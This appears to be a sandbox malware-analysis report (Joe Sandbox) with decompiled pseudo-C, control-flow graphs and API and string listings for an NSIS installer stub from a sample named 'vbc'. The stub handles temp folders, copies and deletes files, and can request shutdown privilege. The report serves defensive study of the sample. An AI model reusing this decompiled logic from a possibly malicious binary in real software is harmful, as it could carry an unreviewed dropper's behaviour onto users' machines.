                                                        Function 00403646 Relevance: 82.7, APIs: 34, Strings: 13, Instructions: 450stringfilecomCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 403646-403696 SetErrorMode GetVersionExW 1 4036d0-4036d7 0->1 2 403698-4036cc GetVersionExW 0->2 3 4036e1-403721 1->3 4 4036d9 1->4 2->1 5 403723-40372b call 406a3b 3->5 6 403734 3->6 4->3 5->6 12 40372d 5->12 7 403739-40374d call 4069cb lstrlenA 6->7 13 40374f-40376b call 406a3b * 3 7->13 12->6 20 40377c-4037de #17 OleInitialize SHGetFileInfoW call 40666e GetCommandLineW call 40666e 13->20 21 40376d-403773 13->21 28 4037e0-4037e2 20->28 29 4037e7-4037fa call 405f6a CharNextW 20->29 21->20 26 403775 21->26 26->20 28->29 32 4038f1-4038f7 29->32 33 4038fd 32->33 34 4037ff-403805 32->34 37 403911-40392b GetTempPathW call 403615 33->37 35 403807-40380c 34->35 36 40380e-403814 34->36 35->35 35->36 39 403816-40381a 36->39 40 40381b-40381f 36->40 44 403983-40399b DeleteFileW call 4030d0 37->44 45 40392d-40394b GetWindowsDirectoryW lstrcatW call 403615 37->45 39->40 42 403825-40382b 40->42 43 4038df-4038ed call 405f6a 40->43 47 403845-40387e 42->47 48 40382d-403834 42->48 43->32 61 4038ef-4038f0 43->61 66 4039a1-4039a7 44->66 67 403b72-403b80 ExitProcess OleUninitialize 44->67 45->44 64 40394d-40397d GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403615 45->64 49 403880-403885 47->49 50 40389a-4038d4 47->50 54 403836-403839 48->54 55 40383b 48->55 49->50 56 403887-40388f 49->56 58 4038d6-4038da 50->58 59 4038dc-4038de 50->59 54->47 54->55 55->47 62 403891-403894 56->62 63 403896 56->63 58->59 65 4038ff-40390c call 40666e 58->65 59->43 61->32 62->50 62->63 63->50 64->44 64->67 65->37 71 4039ad-4039c0 call 405f6a 66->71 72 403a4e-403a55 call 403d1d 66->72 68 403b82-403b91 call 405cce ExitProcess 67->68 69 403b97-403b9d 67->69 75 403c15-403c1d 69->75 76 403b9f-403bb4 GetCurrentProcess OpenProcessToken 69->76 87 403a12-403a1f 71->87 88 4039c2-4039f7 71->88 80 403a5a-403a5d 72->80 81 403c22-403c25 ExitProcess 75->81 82 403c1f 75->82 84 403be5-403bf3 call 406a3b 76->84 85 403bb6-403bdf LookupPrivilegeValueW AdjustTokenPrivileges 76->85 80->67 82->81 98 403c01-403c0c ExitWindowsEx 84->98 99 403bf5-403bff 84->99 85->84 91 403a21-403a2f call 406045 87->91 92 403a62-403a76 call 405c39 lstrcatW 87->92 90 4039f9-4039fd 88->90 94 403a06-403a0e 90->94 95 4039ff-403a04 90->95 91->67 107 403a35-403a4b call 40666e * 2 91->107 105 403a83-403a9d lstrcatW lstrcmpiW 92->105 106 403a78-403a7e lstrcatW 92->106 94->90 101 403a10 94->101 95->94 95->101 98->75 100 403c0e-403c10 call 40140b 98->100 99->98 99->100 100->75 101->87 109 403b70 105->109 110 403aa3-403aa6 105->110 106->105 107->72 109->67 112 403aa8-403aad call 405b9f 110->112 113 403aaf call 405c1c 110->113 119 403ab4-403ac4 SetCurrentDirectoryW 112->119 113->119 121 403ad1-403afd call 40666e 119->121 122 403ac6-403acc call 40666e 119->122 126 403b02-403b1d call 4066ab DeleteFileW 121->126 122->121 129 403b5d-403b67 126->129 130 403b1f-403b2f CopyFileW 126->130 129->126 132 403b69-403b6b call 40642e 129->132 130->129 131 403b31-403b51 call 40642e call 4066ab call 405c51 130->131 131->129 140 403b53-403b5a CloseHandle 131->140 132->109 140->129
                                                        C-Code - Quality: 78%
                                                        			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x7b3000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x7a8b58 = _v324.dwBuildNumber;
				 *0x7a8b5c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x7a8b5e != 0x600) {
					_t179 = E00406A3B(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069CB(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A3B(0xb);
				 *0x7a8aa4 = E00406A3B(9);
				_t88 = E00406A3B(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x7a8b5c =  *0x7a8b5c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x7a8b60 = _t88;
				SHGetFileInfoW(0x79ff48, _t188,  &_v1016, 0x2b4, _t188); // executed
				E0040666E(0x7a7aa0, L"NSIS Error");
				E0040666E(0x7b3000, GetCommandLineW());
				_t94 = 0x7b3000;
				_t233 = 0x22;
				 *0x7a8aa0 = 0x400000;
				if( *0x7b3000 == _t233) {
					_t94 = 0x7b3002;
				}
				_t198 = CharNextW(E00405F6A(_t94, 0x7b3000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F6A(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E0040666E(0x7b3800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E00403615(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x7a8b34 == _t188) {
														L77:
														_t119 =  *0x7a8b4c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A3B(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CCE(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x7a8abc == _t188) {
												L51:
												 *0x7a8b4c =  *0x7a8b4c | 0xffffffff;
												_v24 = E00403D1D(_t264);
												goto L68;
											}
											_t218 = E00405F6A(0x7b3000, _t188);
											if(_t218 < 0x7b3000) {
												L48:
												_t263 = _t218 - 0x7b3000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x7b3000) {
													_t189 = E00405C39(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x7b4800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C1C();
														} else {
															E00405B9F();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x7b3800;
														if( *0x7b3800 == 0) {
															E0040666E(0x7b3800, 0x7b4800);
														}
														E0040666E(0x7a9000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x7a9800 = _t143;
														do {
															E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x120)));
															DeleteFileW(0x79f748);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(0x7b6800, 0x79f748, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E0040642E(_t201, 0x79f748, 0);
																	E004066AB(0, 0x79f748, _t234, 0x79f748,  *((intOrPtr*)( *0x7a8ab0 + 0x124)));
																	_t152 = E00405C51(0x79f748);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x7a9800 =  *0x7a9800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E0040642E(_t201, _t234, 0);
														goto L67;
													}
												}
												 *_t218 = _t188;
												_t221 =  &(_t218[2]);
												_t157 = E00406045(_t263,  &(_t218[2]));
												_t264 = _t157;
												if(_t157 == 0) {
													goto L68;
												}
												E0040666E(0x7b3800, _t221);
												E0040666E(0x7b4000, _t221);
												_v8 = _t188;
												goto L51;
											}
											asm("cdq");
											asm("cdq");
											asm("cdq");
											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
											while( *_t218 != _t204 || _t218[1] != _t167) {
												_t218 = _t218;
												if(_t218 >= 0x7b3000) {
													continue;
												}
												break;
											}
											_t188 = 0;
											goto L48;
										}
										GetWindowsDirectoryW(_t234, 0x3fb);
										lstrcatW(_t234, L"\\Temp");
										_t170 = E00403615(_t198, _t252);
										_t253 = _t170;
										if(_t170 != 0) {
											goto L40;
										}
										GetTempPathW(0x3fc, _t234);
										lstrcatW(_t234, L"Low");
										SetEnvironmentVariableW(L"TEMP", _t234);
										SetEnvironmentVariableW(L"TMP", _t234);
										_t175 = E00403615(_t198, _t253);
										_t254 = _t175;
										if(_t175 == 0) {
											goto L68;
										}
										goto L40;
									}
									goto L31;
								}
								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
									goto L29;
								}
								_t177 =  *((intOrPtr*)(_t198 + 8));
								__eflags = _t177 - 0x20;
								if(_t177 == 0x20) {
									L28:
									_t36 =  &_v20;
									 *_t36 = _v20 | 0x00000004;
									__eflags =  *_t36;
									goto L29;
								}
								__eflags = _t177 - _t188;
								if(_t177 != _t188) {
									goto L29;
								}
								goto L28;
							}
							_t178 =  *((intOrPtr*)(_t198 + 2));
							__eflags = _t178 - _t209;
							if(_t178 == _t209) {
								L23:
								 *0x7a8b40 = 1;
								goto L24;
							}
							__eflags = _t178 - _t188;
							if(_t178 != _t188) {
								goto L24;
							}
							goto L23;
						}
					} else {
						goto L16;
					}
					do {
						L16:
						_t198 = _t198 + 2;
						__eflags =  *_t198 - _t209;
					} while ( *_t198 == _t209);
					goto L17;
				}
				goto L37;
			}















































                                                        0x00403654
                                                        0x00403655
                                                        0x0040365c
                                                        0x0040365f
                                                        0x00403666
                                                        0x00403669
                                                        0x0040367c
                                                        0x00403682
                                                        0x00403685
                                                        0x00403688
                                                        0x00403696
                                                        0x0040369e
                                                        0x004036a9
                                                        0x004036c2
                                                        0x004036c4
                                                        0x004036cc
                                                        0x004036cc
                                                        0x004036d7
                                                        0x004036d9
                                                        0x004036d9
                                                        0x004036ee
                                                        0x00403713
                                                        0x00403721
                                                        0x00403724
                                                        0x0040372b
                                                        0x00403732
                                                        0x00403732
                                                        0x0040372b
                                                        0x00403734
                                                        0x00403739
                                                        0x0040373a
                                                        0x00403746
                                                        0x0040374a
                                                        0x00403751
                                                        0x0040375f
                                                        0x00403764
                                                        0x0040376b
                                                        0x0040376f
                                                        0x00403773
                                                        0x00403775
                                                        0x00403775
                                                        0x00403773
                                                        0x0040377c
                                                        0x00403783
                                                        0x00403789
                                                        0x004037a1
                                                        0x004037b1
                                                        0x004037c3
                                                        0x004037ca
                                                        0x004037cc
                                                        0x004037cd
                                                        0x004037de
                                                        0x004037e2
                                                        0x004037e2
                                                        0x004037f5
                                                        0x004037f7
                                                        0x004038f1
                                                        0x004038f1
                                                        0x004038f4
                                                        0x004038f7
                                                        0x00000000
                                                        0x00000000
                                                        0x00403801
                                                        0x00403802
                                                        0x00403805
                                                        0x0040380e
                                                        0x0040380e
                                                        0x00403811
                                                        0x00403814
                                                        0x00403817
                                                        0x0040381a
                                                        0x0040381a
                                                        0x0040381a
                                                        0x0040381b
                                                        0x0040381f
                                                        0x004038df
                                                        0x004038e8
                                                        0x004038ea
                                                        0x004038ed
                                                        0x004038f0
                                                        0x004038f0
                                                        0x004038f0
                                                        0x00000000
                                                        0x00403825
                                                        0x00403826
                                                        0x00403827
                                                        0x0040382b
                                                        0x00403845
                                                        0x0040384c
                                                        0x0040385f
                                                        0x00403860
                                                        0x00403875
                                                        0x0040387a
                                                        0x0040387c
                                                        0x0040387e
                                                        0x0040389a
                                                        0x004038a1
                                                        0x004038b4
                                                        0x004038b5
                                                        0x004038ca
                                                        0x004038d0
                                                        0x004038d2
                                                        0x004038d4
                                                        0x004038dc
                                                        0x004038de
                                                        0x00000000
                                                        0x004038de
                                                        0x004038d8
                                                        0x004038da
                                                        0x004038ff
                                                        0x00403903
                                                        0x0040390c
                                                        0x00403911
                                                        0x00403917
                                                        0x00403922
                                                        0x00403924
                                                        0x00403929
                                                        0x0040392b
                                                        0x00403983
                                                        0x00403988
                                                        0x00403991
                                                        0x00403998
                                                        0x0040399b
                                                        0x00403b72
                                                        0x00403b72
                                                        0x00403b77
                                                        0x00403b80
                                                        0x00403b9d
                                                        0x00403c15
                                                        0x00403c15
                                                        0x00403c1d
                                                        0x00403c1f
                                                        0x00403c1f
                                                        0x00403c25
                                                        0x00403c25
                                                        0x00403bb4
                                                        0x00403bc0
                                                        0x00403bd1
                                                        0x00403bd8
                                                        0x00403bdf
                                                        0x00403bdf
                                                        0x00403be7
                                                        0x00403bf3
                                                        0x00403c01
                                                        0x00403c0c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403bf5
                                                        0x00403bf5
                                                        0x00403bf6
                                                        0x00403bf8
                                                        0x00403bf9
                                                        0x00403bfa
                                                        0x00403bff
                                                        0x00403c0e
                                                        0x00403c10
                                                        0x00000000
                                                        0x00403c10
                                                        0x00000000
                                                        0x00403bff
                                                        0x00403bf3
                                                        0x00403b8a
                                                        0x00403b91
                                                        0x00403b91
                                                        0x004039a7
                                                        0x00403a4e
                                                        0x00403a4e
                                                        0x00403a5a
                                                        0x00000000
                                                        0x00403a5a
                                                        0x004039b8
                                                        0x004039c0
                                                        0x00403a12
                                                        0x00403a12
                                                        0x00403a18
                                                        0x00403a1f
                                                        0x00403a6d
                                                        0x00403a6f
                                                        0x00403a74
                                                        0x00403a76
                                                        0x00403a7e
                                                        0x00403a7e
                                                        0x00403a89
                                                        0x00403a95
                                                        0x00403a9b
                                                        0x00403a9d
                                                        0x00403b70
                                                        0x00403b70
                                                        0x00403b70
                                                        0x00000000
                                                        0x00403aa3
                                                        0x00403aa3
                                                        0x00403aa5
                                                        0x00403aa6
                                                        0x00403aaf
                                                        0x00403aa8
                                                        0x00403aa8
                                                        0x00403aa8
                                                        0x00403ab5
                                                        0x00403abd
                                                        0x00403ac4
                                                        0x00403acc
                                                        0x00403acc
                                                        0x00403ad9
                                                        0x00403ae5
                                                        0x00403aef
                                                        0x00403aef
                                                        0x00403af1
                                                        0x00403af8
                                                        0x00403b02
                                                        0x00403b0e
                                                        0x00403b14
                                                        0x00403b1a
                                                        0x00403b1d
                                                        0x00403b27
                                                        0x00403b2d
                                                        0x00403b2f
                                                        0x00403b33
                                                        0x00403b44
                                                        0x00403b4a
                                                        0x00403b4f
                                                        0x00403b51
                                                        0x00403b54
                                                        0x00403b5a
                                                        0x00403b5a
                                                        0x00403b51
                                                        0x00403b2f
                                                        0x00403b5d
                                                        0x00403b64
                                                        0x00403b64
                                                        0x00403b64
                                                        0x00403b64
                                                        0x00403b6b
                                                        0x00000000
                                                        0x00403b6b
                                                        0x00403a9d
                                                        0x00403a21
                                                        0x00403a24
                                                        0x00403a28
                                                        0x00403a2d
                                                        0x00403a2f
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a3b
                                                        0x00403a46
                                                        0x00403a4b
                                                        0x00000000
                                                        0x00403a4b
                                                        0x004039c9
                                                        0x004039e1
                                                        0x004039f2
                                                        0x004039f3
                                                        0x004039f7
                                                        0x004039f9
                                                        0x00403a07
                                                        0x00403a0e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403a0e
                                                        0x00403a10
                                                        0x00000000
                                                        0x00403a10
                                                        0x00403933
                                                        0x0040393f
                                                        0x00403944
                                                        0x00403949
                                                        0x0040394b
                                                        0x00000000
                                                        0x00000000
                                                        0x00403953
                                                        0x0040395b
                                                        0x0040396c
                                                        0x00403974
                                                        0x00403976
                                                        0x0040397b
                                                        0x0040397d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040397d
                                                        0x00000000
                                                        0x004038da
                                                        0x00403883
                                                        0x00403885
                                                        0x00000000
                                                        0x00000000
                                                        0x00403887
                                                        0x0040388b
                                                        0x0040388f
                                                        0x00403896
                                                        0x00403896
                                                        0x00403896
                                                        0x00403896
                                                        0x00000000
                                                        0x00403896
                                                        0x00403891
                                                        0x00403894
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403894
                                                        0x0040382d
                                                        0x00403831
                                                        0x00403834
                                                        0x0040383b
                                                        0x0040383b
                                                        0x00000000
                                                        0x0040383b
                                                        0x00403836
                                                        0x00403839
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403839
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403807
                                                        0x00403807
                                                        0x00403808
                                                        0x00403809
                                                        0x00403809
                                                        0x00000000
                                                        0x00403807
                                                        0x00000000

                                                        APIs
                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00403669
                                                        • GetVersionExW.KERNEL32(?), ref: 00403692
                                                        • GetVersionExW.KERNEL32(0000011C), ref: 004036A9
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403740
                                                        • #17.COMCTL32(00000007,00000009,0000000B), ref: 0040377C
                                                        • OleInitialize.OLE32(00000000), ref: 00403783
                                                        • SHGetFileInfoW.SHELL32(0079FF48,00000000,?,000002B4,00000000), ref: 004037A1
                                                        • GetCommandLineW.KERNEL32(007A7AA0,NSIS Error), ref: 004037B6
                                                        • CharNextW.USER32(00000000), ref: 004037EF
                                                        • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 00403922
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403933
                                                        • lstrcatW.KERNEL32 ref: 0040393F
                                                        • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\), ref: 00403953
                                                        • lstrcatW.KERNEL32 ref: 0040395B
                                                        • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 0040396C
                                                        • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 00403974
                                                        • DeleteFileW.KERNELBASE(1033), ref: 00403988
                                                        • lstrcatW.KERNEL32 ref: 00403A6F
                                                        • lstrcatW.KERNEL32 ref: 00403A7E
                                                          • Part of subcall function 00405C1C: CreateDirectoryW.KERNELBASE(?,00000000,00403639,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403929), ref: 00405C22
                                                        • lstrcatW.KERNEL32 ref: 00403A89
                                                        • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,007B4800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,007B3000,00000000,?), ref: 00403A95
                                                        • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AB5
                                                        • DeleteFileW.KERNEL32(0079F748,0079F748,?,007A9000,?), ref: 00403B14
                                                        • CopyFileW.KERNEL32 ref: 00403B27
                                                        • CloseHandle.KERNEL32(00000000), ref: 00403B54
                                                        • ExitProcess.KERNELBASE(?), ref: 00403B72
                                                        • OleUninitialize.OLE32 ref: 00403B77
                                                        • ExitProcess.KERNEL32 ref: 00403B91
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403BA5
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403BAC
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BC0
                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BDF
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 00403C04
                                                        • ExitProcess.KERNEL32 ref: 00403C25
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Processlstrcat$ExitFile$Directory$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
                                                        • String ID: .tmp$1033$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 2292928366-4036104658
                                                        • Opcode ID: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                                        • Instruction ID: 9002a92140da6a8b371a97510ecbbb4cdf1836846ed801e4a5207059f252ac0c
                                                        • Opcode Fuzzy Hash: 750da170c5ec3071fbc253d64d945ba09a8a0fe5a141c473f87f6f160000b61b
                                                        • Instruction Fuzzy Hash: EAE13571A00214AAD720AFB58D45BAF7EB9EB45709F10843EF541B62D1DB7C8E41CB2D
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00405D7A Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148filestringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 391 405d7a-405da0 call 406045 394 405da2-405db4 DeleteFileW 391->394 395 405db9-405dc0 391->395 396 405f36-405f3a 394->396 397 405dc2-405dc4 395->397 398 405dd3-405de3 call 40666e 395->398 400 405ee4-405ee9 397->400 401 405dca-405dcd 397->401 404 405df2-405df3 call 405f89 398->404 405 405de5-405df0 lstrcatW 398->405 400->396 403 405eeb-405eee 400->403 401->398 401->400 406 405ef0-405ef6 403->406 407 405ef8-405f00 call 4069a4 403->407 408 405df8-405dfc 404->408 405->408 406->396 407->396 415 405f02-405f16 call 405f3d call 405d32 407->415 411 405e08-405e0e lstrcatW 408->411 412 405dfe-405e06 408->412 414 405e13-405e2f lstrlenW FindFirstFileW 411->414 412->411 412->414 416 405e35-405e3d 414->416 417 405ed9-405edd 414->417 433 405f18-405f1b 415->433 434 405f2e-405f31 call 4056d0 415->434 420 405e5d-405e71 call 40666e 416->420 421 405e3f-405e47 416->421 417->400 419 405edf 417->419 419->400 431 405e73-405e7b 420->431 432 405e88-405e93 call 405d32 420->432 423 405e49-405e51 421->423 424 405ebc-405ecc FindNextFileW 421->424 423->420 428 405e53-405e5b 423->428 424->416 427 405ed2-405ed3 FindClose 424->427 427->417 428->420 428->424 431->424 436 405e7d-405e86 call 405d7a 431->436 444 405eb4-405eb7 call 4056d0 432->444 445 405e95-405e98 432->445 433->406 435 405f1d-405f2c call 4056d0 call 40642e 433->435 434->396 435->396 436->424 444->424 447 405e9a-405eaa call 4056d0 call 40642e 445->447 448 405eac-405eb2 445->448 447->424 448->424
                                                        C-Code - Quality: 98%
                                                        			E00405D7A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00406045(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x7a8b28 =  *0x7a8b28 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040666E(0x7a3f90, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405F89(_t68);
					} else {
